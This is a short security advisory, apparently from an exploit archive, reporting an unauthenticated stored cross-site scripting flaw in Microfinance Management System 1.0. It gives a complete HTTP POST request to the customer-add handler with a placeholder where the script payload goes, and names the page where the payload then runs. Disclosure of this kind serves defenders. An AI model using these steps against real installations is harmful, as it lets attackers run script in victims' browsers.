Microfinance Management System 1.0 Cross Site Scripting

Microfinance Management System version 1.0 suffers from a persistent cross site scripting vulnerability.

MD5 | 8fc925831ed26aadd3946c30c4b45d22

# Exploit Title: Microfinance Management System 1.0 - Cross-site scripting
stored (unauthenticated)
# Date: 23/03/2022
# Exploit Author: Mr Empy
# Software Link:
# Version: 1.0
# Tested on: Linux

Microfinance Management System 1.0 - Cross-site scripting stored

Microfinance Management System version 1.0 is affected by the Cross-site
Scripting vulnerability due to poor hygiene in certain parameters. The
attacker could take advantage of this flaw to inject arbitrary javascript
code to manipulate the victim's browser capabilities.

Severity Level:
6.5 (Medium)

Affected Product:
Microfinance Management System v1.0

Steps to Reproduce:

1. Open a request repeater (like Burp Suite) and send this request:

POST /mims/app/addcustomerHandler.php HTTP/1.1
Host: target.com
Content-Length: 310
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://target.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/95.0.4638.69 Safari/537.36
Referer: http://target.com/mims/addcustomer.php
Accept-Encoding: gzip, deflate
Accept-Language: pt-PT,pt;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

customer_number=335341988&customer_type=14465108&first_name=<XSS PAYLOAD
HERE>&middle_name=<XSS PAYLOAD HERE>&surname=<XSS PAYLOAD

You can find your XSS payload in the /mims/managecustomer.php endpoint.

Related Posts